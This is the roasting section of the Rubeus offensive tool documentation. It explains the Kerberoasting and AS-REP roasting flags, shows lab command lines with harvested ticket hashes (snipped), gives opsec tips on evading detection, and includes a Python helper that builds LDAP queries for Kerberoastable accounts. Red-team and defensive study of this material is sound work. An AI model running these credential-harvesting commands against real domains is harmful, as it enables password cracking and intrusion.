Roasting

Breakdown of the roasting commands:

kerberoast

The kerberoast action replaces the SharpRoast project's functionality. Like SharpRoast, this action uses the KerberosRequestorSecurityToken.GetRequest() method (https://msdn.microsoft.com/en-us/library/system.identitymodel.tokens.kerberosrequestorsecuritytoken.getrequest(v=vs.110).aspx), the approach @machosec contributed to PowerView, in order to request the proper service ticket (this is the default behavior; see the opsec table for more detail). Unlike SharpRoast, this action now performs proper ASN.1 parsing of the result structures.

With no other arguments, all user accounts with SPNs set in the current domain are Kerberoasted, requesting their highest supported encryption type (see the opsec table). The /spn:X argument roasts just the specified SPN, the /user:X argument roasts just the specified user, and the /ou:X argument roasts just users in the specified OU. The /domain and /dc arguments are optional, pulling system defaults as other actions do.

The /stats flag will output statistics about kerberoastable users found, including a breakdown of supported encryption types and years user passwords were last set. This flag can be combined with other targeting options.

The /outfile:FILE argument outputs roasted hashes to the specified file, one per line.

If the /simple flag is specified, roasted hashes will be output to the console, one per line.

If the /nowrap flag is specified, Kerberoast results will not be line-wrapped.

If a TGT is supplied with /ticket:X (the base64 encoding of a .kirbi file, or the path to a .kirbi file on disk), that TGT is used to request the service tickets during roasting. If /ticket:X is used with /spn:Y or /spns:Y (/spns: can be a file with one SPN per line, or a comma-separated list), no LDAP searching for users happens, so roasting can be done from a non-domain-joined system in conjunction with /dc:Z.

If the /tgtdeleg flag is supplied, the tgtdeleg trick is used to get a usable TGT for the current user, which is then used for the roasting requests. If this flag is used, accounts with AES enabled in msDS-SupportedEncryptionTypes will have RC4 tickets requested. Note that an RC4 service ticket issued for an AES-enabled account is itself a detection signal (the resulting 4769 event on the DC shows ticket encryption type 0x17 for an account that advertises AES), which is what the /rc4opsec flag below is designed to avoid.

If the /aes flag is supplied, accounts with AES encryption enabled in msDS-SupportedEncryptionTypes are enumerated and AES service tickets are requested.

If the /ldapfilter:X argument is supplied, the supplied LDAP filter will be added to the final LDAP query used to find Kerberoastable users.

If the /rc4opsec flag is specified, the tgtdeleg trick is used, and only accounts without AES enabled in msDS-SupportedEncryptionTypes are enumerated and roasted (with RC4), so no RC4 ticket is ever requested for an AES-enabled account.

If you want to use alternate domain credentials for Kerberoasting (and searching for users to Kerberoast), they can be specified with /creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD.

If the /pwdsetafter:MM-dd-yyyy argument is supplied, only accounts whose password was last changed after MM-dd-yyyy will be enumerated and roasted.

If the /pwdsetbefore:MM-dd-yyyy argument is supplied, only accounts whose password was last changed before MM-dd-yyyy will be enumerated and roasted.

If the /resultlimit:NUMBER argument is specified, the number of accounts that will be enumerated and roasted is limited to NUMBER.

If the /delay:MILLISECONDS argument is specified, that number of milliseconds is paused between TGS requests. The /jitter:1-100 argument can be combined with it to add a percentage of jitter to that delay.

If the /enterprise flag is used, the SPN is assumed to be an enterprise principal (i.e. user@domain.com). This flag only works when Kerberoasting with a TGT.

If the /autoenterprise flag is used and roasting an SPN fails (due to an invalid or duplicate SPN), Rubeus will automatically retry using the enterprise principal. This is only useful when /spn or /spns is not supplied, as Rubeus needs to know the target account's samAccountName, which it gets when querying LDAP for the account information.
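The targeting options above all resolve to two things: the msDS-SupportedEncryptionTypes bitmask that decides which etype gets requested (and that the /stats and "Supported ETypes" output decodes), and an LDAP filter. The following is an added illustration, not Rubeus code, of how those pieces fit together: it decodes the bitmask the way Rubeus labels it (an unset attribute is reported as RC4_HMAC_DEFAULT), converts the MM-dd-yyyy dates of /pwdsetafter and /pwdsetbefore into the FILETIME form pwdLastSet is stored in, and assembles a filter for the /user, /spn, /ou, /rc4opsec, /aes and /ldapfilter options. The bit values are from MS-KILE; the exact filter clauses and the 805306368 / krbtgt / disabled-account exclusions are assumptions about what a Kerberoast query should contain, not copied from Rubeus' source.

```python
"""Added illustration (not Rubeus code): decode msDS-SupportedEncryptionTypes
and assemble the LDAP query implied by the kerberoast targeting options."""
from datetime import datetime, timezone

# msDS-SupportedEncryptionTypes bit flags (MS-KILE 2.2.7 / MS-ADTS).
ETYPE_BITS = (
    (0x01, "DES_CBC_CRC"),
    (0x02, "DES_CBC_MD5"),
    (0x04, "RC4_HMAC"),
    (0x08, "AES128_CTS_HMAC_SHA1_96"),
    (0x10, "AES256_CTS_HMAC_SHA1_96"),
)
AES_MASK = 0x08 | 0x10                        # 24: either AES etype enabled
LDAP_MATCHING_RULE_BIT_OR = "1.2.840.113556.1.4.804"
LDAP_MATCHING_RULE_BIT_AND = "1.2.840.113556.1.4.803"
UF_ACCOUNTDISABLE = 0x2
FILETIME_EPOCH_DELTA = 11644473600            # seconds from 1601-01-01 to 1970-01-01


def decode_etypes(value):
    """Names for an msDS-SupportedEncryptionTypes value. An absent or zero
    attribute means the KDC falls back to RC4, which Rubeus reports as
    RC4_HMAC_DEFAULT."""
    if not value:
        return ["RC4_HMAC_DEFAULT"]
    return [name for bit, name in ETYPE_BITS if value & bit]


def aes_enabled(value):
    """True when the account advertises AES128 and/or AES256."""
    return bool((value or 0) & AES_MASK)


def ldap_escape(text):
    """RFC 4515 escaping so a caller-supplied value cannot alter the filter."""
    return "".join("\\%02x" % ord(ch) if ch in "\\*()\x00" else ch for ch in text)


def to_filetime(dt):
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC). pwdLastSet is
    stored in this form, so date filters must be converted before comparing."""
    return int((dt.timestamp() + FILETIME_EPOCH_DELTA) * 10_000_000)


def parse_mm_dd_yyyy(text):
    """Parse the MM-dd-yyyy form used by /pwdsetafter and /pwdsetbefore (UTC)."""
    return datetime.strptime(text, "%m-%d-%Y").replace(tzinfo=timezone.utc)


def search_base(domain, ou=None):
    """The /ou argument narrows the LDAP search base rather than the filter."""
    return ou or "DC=" + ",DC=".join(domain.split("."))


def build_kerberoast_filter(user=None, spn=None, pwdsetafter=None,
                            pwdsetbefore=None, rc4opsec=False, aes=False,
                            ldapfilter=None):
    """Assemble an LDAP filter for Kerberoastable users (assumed clauses)."""
    if rc4opsec and aes:
        raise ValueError("/rc4opsec and /aes are mutually exclusive")
    clauses = [
        "(samAccountType=805306368)",                  # normal user objects
        "(servicePrincipalName=*)",                    # has at least one SPN
        "(!(samAccountName=krbtgt))",                  # krbtgt has a random key
        "(!(userAccountControl:%s:=%d))" % (LDAP_MATCHING_RULE_BIT_AND, UF_ACCOUNTDISABLE),
    ]
    if user:
        clauses.append("(samAccountName=%s)" % ldap_escape(user))
    if spn:
        clauses.append("(servicePrincipalName=%s)" % ldap_escape(spn))
    if pwdsetafter:
        clauses.append("(pwdLastSet>=%d)" % to_filetime(parse_mm_dd_yyyy(pwdsetafter)))
    if pwdsetbefore:
        clauses.append("(pwdLastSet<=%d)" % to_filetime(parse_mm_dd_yyyy(pwdsetbefore)))
    if rc4opsec:
        # Bitwise-OR rule matches when any AES bit is set; negated, it also
        # matches accounts whose attribute is absent (the RC4_HMAC_DEFAULT case).
        clauses.append("(!(msDS-SupportedEncryptionTypes:%s:=%d))" % (LDAP_MATCHING_RULE_BIT_OR, AES_MASK))
    if aes:
        clauses.append("(msDS-SupportedEncryptionTypes:%s:=%d)" % (LDAP_MATCHING_RULE_BIT_OR, AES_MASK))
    if ldapfilter:
        clauses.append(ldapfilter if ldapfilter.startswith("(") else "(%s)" % ldapfilter)
    return "(&" + "".join(clauses) + ")"


if __name__ == "__main__":
    # Mirrors the /tgtdeleg /pwdsetafter /pwdsetbefore example further down.
    print(search_base("theshire.local"))
    print(build_kerberoast_filter(pwdsetafter="01-31-2005", pwdsetbefore="03-29-2010"))
    for v in (0, 4, 24, 28):
        print(v, decode_etypes(v), "AES" if aes_enabled(v) else "no AES")
```

The negated bitwise-OR clause is the interesting part: because `(!(attr:1.2.840.113556.1.4.804:=24))` also matches objects that have no msDS-SupportedEncryptionTypes at all, an "RC4 only" query naturally includes the RC4_HMAC_DEFAULT accounts that appear in the /rc4opsec example output below.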

kerberoasting opsec

Here is a table comparing the behavior of various flags from an opsec perspective:

Examples

Kerberoasting all users in the current domain using the default KerberosRequestorSecurityToken.GetRequest method:

C:\Rubeus>Rubeus.exe kerberoast

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.4


[*] Action: Kerberoasting


[*] SamAccountName         : harmj0y
[*] DistinguishedName      : CN=harmj0y,CN=Users,DC=testlab,DC=local
[*] ServicePrincipalName   : asdf/asdfasdf
[*] Hash                   : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$AE5F019D4CDED6CD74830CC...(snip)...


[*] SamAccountName         : sqlservice
[*] DistinguishedName      : CN=SQL,CN=Users,DC=testlab,DC=local
[*] ServicePrincipalName   : MSSQLSvc/SQL.testlab.local
[*] Hash                   : $krb5tgs$23$*$testlab.local$MSSQLSvc/SQL.testlab.local*$E2B3869290...(snip)...

...(snip)...

Kerberoasting all users in a specific OU, saving the hashes to an output file:

C:\Rubeus>Rubeus.exe kerberoast /ou:OU=TestingOU,DC=testlab,DC=local /outfile:C:\Temp\hashes.txt

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.4


[*] Action: Kerberoasting

[*] Target OU              : OU=TestingOU,DC=testlab,DC=local

[*] SamAccountName         : testuser2
[*] DistinguishedName      : CN=testuser2,OU=TestingOU,DC=testlab,DC=local
[*] ServicePrincipalName   : service/host
[*] Hash written to C:\Temp\hashes.txt

[*] Roasted hashes written to : C:\Temp\hashes.txt

Perform Kerberoasting using the tgtdeleg trick to get a usable TGT, requesting tickets only for accounts whose password was last set between 01-31-2005 and 03-29-2010, returning up to 3 service tickets:

C:\Rubeus>Rubeus.exe kerberoast /tgtdeleg /pwdsetafter:01-31-2005 /pwdsetbefore:03-29-2010 /resultlimit:3

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0


[*] Action: Kerberoasting

[*] Using 'tgtdeleg' to request a TGT for the current user
[*] RC4_HMAC will be the requested for AES-enabled accounts, all etypes will be requested for everything else
[*] Searching the current domain for Kerberoastable users
[*] Searching for accounts with lastpwdset from 01-31-2005 to 03-29-2010
[*] Up to 3 result(s) will be returned

[*] Total kerberoastable users : 3


[*] SamAccountName         : harmj0y
[*] DistinguishedName      : CN=harmj0y,OU=TestOU,DC=theshire,DC=local
[*] ServicePrincipalName   : testspn/server
[*] PwdLastSet             : 5/31/2008 12:00:02 AM
[*] Supported ETypes       : AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96
[*] Hash                   : $krb5tgs$23$*harmj0y$theshire.local$testspn/server*$F6EEFE5026CF8F02E3DC...(snip)...


[*] SamAccountName         : constraineduser
[*] DistinguishedName      : CN=constraineduser,CN=Users,DC=theshire,DC=local
[*] ServicePrincipalName   : blah/blah123
[*] PwdLastSet             : 9/5/2009 7:48:50 PM
[*] Supported ETypes       : RC4_HMAC
[*] Hash                   : $krb5tgs$23$*constraineduser$theshire.local$blah/blah123*$6F0992C377AA12...(snip)...


[*] SamAccountName         : newuser
[*] DistinguishedName      : CN=newuser,CN=Users,DC=theshire,DC=local
[*] ServicePrincipalName   : blah/blah123456
[*] PwdLastSet             : 9/12/2008 8:05:16 PM
[*] Supported ETypes       : RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96
[*] Hash                   : $krb5tgs$23$*newuser$theshire.local$blah/blah123456*$C4561559C2A7DF07712...(snip)...

List statistics about found Kerberoastable accounts without actually sending ticket requests:

C:\Rubeus>Rubeus.exe kerberoast /stats

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0


[*] Action: Kerberoasting

[*] Listing statistics about target users, no ticket requests being performed.
[*] Searching the current domain for Kerberoastable users

[*] Total kerberoastable users : 4


 ----------------------------------------------------------------------
 | Supported Encryption Type                                  | Count |
 ----------------------------------------------------------------------
 | RC4_HMAC_DEFAULT                                           | 1     |
 | RC4_HMAC                                                   | 1     |
 | AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96           | 1     |
 | RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96 | 1     |
 ----------------------------------------------------------------------

 ----------------------------------
 | Password Last Set Year | Count |
 ----------------------------------
 | 2019                   | 4     |
 ----------------------------------

Kerberoasting a specific user, with simplified hash output:

C:\Rubeus>Rubeus.exe kerberoast /user:harmj0y /simple

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target User            : harmj0y
[*] Searching the current domain for Kerberoastable users

[*] Total kerberoastable users : 1

$krb5tgs$18$*harmj0y$theshire.local$testspn/server*$F63783C58AA153F24DFCC796A120C55C$06C6929374A2D3...(snip)...

Kerberoasting all users in a foreign trusting domain, not line-wrapping the results:

C:\Rubeus>Rubeus.exe kerberoast /domain:dev.testlab.local /nowrap

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.5.0


[*] Action: Kerberoasting

[*] Target Domain          : dev.testlab.local

[*] SamAccountName         : jason
[*] DistinguishedName      : CN=jason,CN=Users,DC=dev,DC=testlab,DC=local
[*] ServicePrincipalName   : test/test
[*] Hash                   : $krb5tgs$23$*$dev.testlab.local$test/test@dev.testlab.local*$969339A82...(snip)...

Kerberoasting using an existing TGT:

C:\Rubeus>Rubeus.exe kerberoast /ticket:doIFujCCBbagAwIBBaEDAgEWoo...(snip)... /spn:"asdf/asdfasdf" /dc:primary.testlab.local

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.5


[*] Action: Kerberoasting

[*] Using a TGT /ticket to request service tickets

[*] Target SPN             : asdf/asdfasdf
[*] Hash                   : $krb5tgs$23$*USER$DOMAIN$asdf/asdfasdf*$4EFF99FDED690AB4616EB...(snip)...

"Opsec" Kerberoasting, using the tgtdeleg trick, filtering out AES-enabled accounts:

C:\Rubeus>Rubeus.exe kerberoast /rc4opsec

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.6


[*] Action: Kerberoasting

[*] Using 'tgtdeleg' to request a TGT for the current user
[*] Searching the current domain for Kerberoastable users
[*] Searching for accounts that only support RC4_HMAC, no AES

[*] Found 6 users to Kerberoast!

[*] SamAccountName         : harmj0y
[*] DistinguishedName      : CN=harmj0y,CN=Users,DC=testlab,DC=local
[*] ServicePrincipalName   : asdf/asdfasdf
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*harmj0y$testlab.local$asdf/asdfasdf*$6B4AD4B61D37D54...(snip)...

asreproast

The asreproast action replaces the ASREPRoast project, which executed similar actions with the (larger) BouncyCastle library. If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user without knowing the password, and the encrypted part of that reply (the enc-part, encrypted under the user's password-derived key) can be cracked offline a la Kerberoasting. For more technical information, see this post.

Just as with the kerberoast action, if no other arguments are supplied, all user accounts that do not require Kerberos preauthentication (the DONT_REQ_PREAUTH bit in userAccountControl) are roasted. The /user:X argument roasts just the specified user, and the /ou:X argument roasts just users in the specified OU. The /domain and /dc arguments are optional, pulling system defaults as other actions do.

The /outfile:FILE argument outputs roasted hashes to the specified file, one per line.

Also, if you want to use alternate domain credentials for AS-REP roasting, they can be specified with /creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD.

The output /format:X defaults to John the Ripper (Jumbo version), which takes lines of the form $krb5asrep$user@domain:checksum$edata. /format:hashcat is also an option for the new hashcat mode 18200; the only difference is that hashcat's form carries the etype as a prefix ($krb5asrep$23$user@domain:checksum$edata).

AS-REP roasting all users in the current domain:

C:\Rubeus>Rubeus.exe asreproast

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.4


[*] Action: AS-REP roasting

[*] Target Domain          : testlab.local

[*] SamAccountName         : dfm.a
[*] DistinguishedName      : CN=dfm.a,CN=Users,DC=testlab,DC=local
[*] Using domain controller: testlab.local (192.168.52.100)
[*] Building AS-REQ (w/o preauth) for: 'testlab.local\dfm.a'
[*] Connecting to 192.168.52.100:88
[*] Sent 163 bytes
[*] Received 1537 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

    $krb5asrep$dfm.a@testlab.local:D4A4BC281B200EE35CBF4A4537792D07$D655...(snip)...

[*] SamAccountName         : TestOU3user
[*] DistinguishedName      : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
[*] Using domain controller: testlab.local (192.168.52.100)
[*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user'
[*] Connecting to 192.168.52.100:88
[*] Sent 169 bytes
[*] Received 1437 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

    $krb5asrep$TestOU3user@testlab.local:DD6DF16B7E65223679CD703837C94FB...(snip)..

[*] SamAccountName         : harmj0y2
[*] DistinguishedName      : CN=harmj0y2,CN=Users,DC=testlab,DC=local
[*] Using domain controller: testlab.local (192.168.52.100)
[*] Building AS-REQ (w/o preauth) for: 'testlab.local\harmj0y2'
[*] Connecting to 192.168.52.100:88
[*] Sent 166 bytes
[*] Received 1407 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

    $krb5asrep$harmj0y2@testlab.local:7D2E379A076BB804AF275ED51B86BF85$8...(snip)..

AS-REP roasting all users in a specific OU, saving the hashes to an output file in Hashcat format:

C:\Rubeus>Rubeus.exe asreproast /ou:OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local /format:hashcat /outfile:C:\Temp\hashes.txt

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.4


[*] Action: AS-REP roasting

[*] Target OU              : OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
[*] Target Domain          : testlab.local

[*] SamAccountName         : TestOU3user
[*] DistinguishedName      : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
[*] Using domain controller: testlab.local (192.168.52.100)
[*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user'
[*] Connecting to 192.168.52.100:88
[*] Sent 169 bytes
[*] Received 1437 bytes
[+] AS-REQ w/o preauth successful!
[*] Hash written to C:\Temp\hashes.txt

[*] Roasted hashes written to : C:\Temp\hashes.txt

AS-REP roasting a specific user:

C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.4


[*] Action: AS-REP roasting

[*] Target User            : TestOU3user
[*] Target Domain          : testlab.local

[*] SamAccountName         : TestOU3user
[*] DistinguishedName      : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
[*] Using domain controller: testlab.local (192.168.52.100)
[*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user'
[*] Connecting to 192.168.52.100:88
[*] Sent 169 bytes
[*] Received 1437 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

    $krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)...

AS-REP roasting all users in a foreign trusting domain:

C:\Rubeus>Rubeus.exe asreproast /domain:dev.testlab.local

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.4


[*] Action: AS-REP roasting

[*] Target Domain          : dev.testlab.local

[*] SamAccountName         : devuser3
[*] DistinguishedName      : CN=devuser3,CN=Users,DC=dev,DC=testlab,DC=local
[*] Using domain controller: dev.testlab.local (192.168.52.105)
[*] Building AS-REQ (w/o preauth) for: 'dev.testlab.local\devuser3'
[*] Connecting to 192.168.52.105:88
[*] Sent 175 bytes
[*] Received 1448 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

    $krb5asrep$devuser3@dev.testlab.local:650B881E44B92FB6A378DD21E8B020...(snip)...

AS-REP roasting users in a foreign non-trusting domain using alternate credentials:

C:\Rubeus>Rubeus.exe asreproast /domain:external.local /creduser:"EXTERNAL.local\administrator" /credpassword:"Password123!"

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.4


[*] Action: AS-REP roasting

[*] Target Domain          : external.local

[*] Using alternate creds  : EXTERNAL.local\administrator

[*] SamAccountName         : david
[*] DistinguishedName      : CN=david,CN=Users,DC=external,DC=local
[*] Using domain controller: external.local (192.168.52.95)
[*] Building AS-REQ (w/o preauth) for: 'external.local\david'
[*] Connecting to 192.168.52.95:88
[*] Sent 165 bytes
[*] Received 1376 bytes
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:

    $krb5asrep$david@external.local:9F5A33465C53056F17FEFDF09B7D36DD$47DBAC3...(snip)...
